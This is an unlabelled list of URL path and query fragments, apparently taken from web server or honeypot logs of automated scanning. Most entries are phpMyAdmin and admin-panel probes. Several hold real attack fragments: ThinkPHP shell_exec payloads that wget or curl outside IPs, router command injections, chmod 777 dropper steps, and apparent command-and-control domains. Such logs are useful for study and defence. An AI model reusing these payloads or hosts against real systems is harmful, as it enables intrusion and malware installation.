static
wp-pma-mod
v1
struts2-rest-showcase
phpMyadmin
phpMyAdmin+++---
invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http:
login.cgi?cli=aa%20aa%27;wget%20http:
scripts
phpmyadmin
189.40.40.159:7898
.git
jbws
pma
180.163.113.82
mysqlmanager
ws
x;sh%20
english
TP
Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20
www.epochtimes.com
phpMyAdminold
thinkphp
search
logout
.svn
pmamy2
pmamy
666trapgod;chmod%20777%20
diag_Form?images
invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%2046.30.43.159:81
jexinv4
bins
phpMyadmin_bak
205.185.113.123
a
www
invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%2046.30.43.159:81
103.81.244.25
209.141.33.119
www.rfa.org
phpmyadm1n
admin
phpMyAdmin-4.4.0
apps
www.ip.cn
dbadmin
index
.eSeAlg;%20chmod%20777%20
jexws2
auth
media
recordings
5.188.210.12
phpmyadmin2
sqlmanager
plugins
zecmd
pwd
\x5Cthink\x5Capp
.well-known
phppma
89.46.223.70
html
GponForm
666trapgod;.
program
jexws4
phpmyadmin1
cacti
nadezhda.x86_64;cat%20nadezhda.x86_64%20>%20.beznadezhnyy;chmod%20777%20.beznadezhnyy;.
jexinv3
egg.x86;cat%20egg.x86%20>%20lzrd;chmod%20777%20lzrd;.
phpMyAdmin
phpmyadmin0
185.244.25.178
public
api.ipify.org
typo3
pmd
PMA2
phpMyAdmion
phpmyadmin-old
phpMyAdmin__
.eSeAlg;%20
www.123cha.com
cgi-bin
console
shopdb
cnc.arm7plz.xyz
www.wujieliulan.com
PMA
128.199.251.119
invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20
boxun.com
wstats
phpMyAdmin123
mysql-admin
.bins
myadmin2
tmp;wget%20http:
jbossass
phpMyAbmin
myadmin
MyAdmin
tmp;%20wget%20http:
demo
HNAP1
185.244.25.150
maker
cnc.junoland.xyz
dread
nobody
phpAdmin
pma-old
snwrite.cgi?mac=1234;wget%20http:
jexws3
create_account
mysql2
manager
x%20-O%20-%3E%20
167.99.219.142
s
Index
weathermap
107.12.60.216:80
jexinv
v
phpMyAdm1n
invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%20176.32.33.124
xampp
evox
jexsw2
phpMyadmi
HCEGH
cluster
idssvc
phpMyAdmin.old
web
mysql_admin
shellinvoker
db
phpMyAdmina
wp-content
login
jvrx
mysqladmin
5.188.210.50
portable-phpmyadmin
webdav
iesvc
phpma
shaAdmin
phpmy
%5Cthink%5Capp
tmp
209.141.50.26
set.x86%20-O%20
phpadmin
airlink.sh%20-O%20
http:
tools
phpMydmin
phpMyAdmin1
93.188.163.62
claroline
invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20176.32.33.124
index.php?s=
mysql
dvwa
